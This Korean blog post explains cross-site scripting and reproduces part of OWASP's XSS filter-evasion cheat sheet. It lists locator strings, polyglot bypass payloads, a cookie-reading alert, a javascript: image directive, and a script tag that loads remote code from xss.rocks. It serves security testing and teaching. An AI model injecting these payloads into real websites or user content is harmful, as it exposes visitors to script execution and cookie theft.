(XSS 필터 우회 치트 시트 : XSS Filter Evasion Cheat Sheet)
크로스 사이트 스크립트(XSS)는 어플리케이션에서 브라우저로 데이터는 전송하는 페이지에서 사용자가 입력한 데이터를 검증하지 않거나, 데이터 출력 시 위험한 데이터를 필터하지 않을 때 발생한다. XSS는 일반적으로 자바스크립트에서 발생 하지만, VB 스크립트등 클라이언트에서 실행되는 동적 데이터를 생성하는 모든 언어에서 발생할 가능성이 있다.
XSS 취약점을 이용한 악성 스크립트 배포, 악성코드 배포등 개인 및 조직의 보안에 큰 위협이 되고 있다.
아래는 OWASP에서 제공하는 XSS 필터를 우회하기 위한 치트 시트이다.
1) XSS Locator
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
2) XSS Locator (short)
'';!--"<XSS>=&{()}
3) No Filter Evasion
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
4) Filter bypass based polyglot
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script>
<script>alert(document.cookie)</script>">
<img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'">
<img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
5) Image XSS using the JavaScript directive
<IMG SRC="javascript:alert('XSS');">
보다 자세한 내용의 우회 치트 시트는 OWASP XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)를 참고 바란다.
OSSEC (Open Soure HIDS SECurity) 설치 요구 사항 (0) | 2016.05.12 |
---|---|
OSSEC (Open Soure HIDS SECurity) (0) | 2016.04.27 |
DROWN Attack — More than 11 Million OpenSSL HTTPS Websites at Risk (0) | 2016.03.02 |
[Android] 윈도우 악성코드에 의해 안드로이드 디바이스 악성코드 감염 시도 사례 (0) | 2014.01.28 |
[Android] 안드로이드 악성코드 개요, 현황, 딜레마 (0) | 2014.01.27 |